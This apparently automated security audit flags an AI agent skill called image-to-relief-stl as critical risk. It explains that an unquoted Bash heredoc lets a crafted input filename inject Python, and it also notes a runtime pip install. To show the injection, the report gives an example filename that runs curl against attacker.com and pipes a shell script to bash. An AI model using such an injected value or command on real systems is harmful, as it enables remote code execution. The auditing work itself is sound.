image-to-relief-stl
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): The script
scripts/image_to_relief.shis vulnerable to arbitrary Python code injection. - Evidence: Lines 86-101 in
scripts/image_to_relief.shuse a Bash heredoc (<<PY) to generate and execute a Python script. Because the delimiterPYis not quoted, Bash performs variable expansion on the$INvariable inside the Python source code string. - Impact: An attacker who can control the input filename (e.g., providing a filename like
"; import os; os.system('curl http://attacker.com/shell | bash'); #) can execute arbitrary commands with the privileges of the agent. - [EXTERNAL_DOWNLOADS] (MEDIUM): The skill performs unverified runtime installation of Python packages.
- Evidence:
scripts/image_to_relief.sh(line 72) executespip install pillowduring the setup phase. - Risk: This introduces a dependency on the PyPI registry at runtime and could be exploited via dependency confusion or typosquatting if the package name were less common.
- [COMMAND_EXECUTION] (LOW): The skill relies on and executes external system binaries.
- Evidence: The skill requires and calls
potraceandmkbitmapfor SVG generation. - Risk: While standard for the skill's stated purpose, it increases the attack surface if these external binaries have their own vulnerabilities when processing malicious image data.
Recommendations
- AI detected serious security threats
Audit Metadata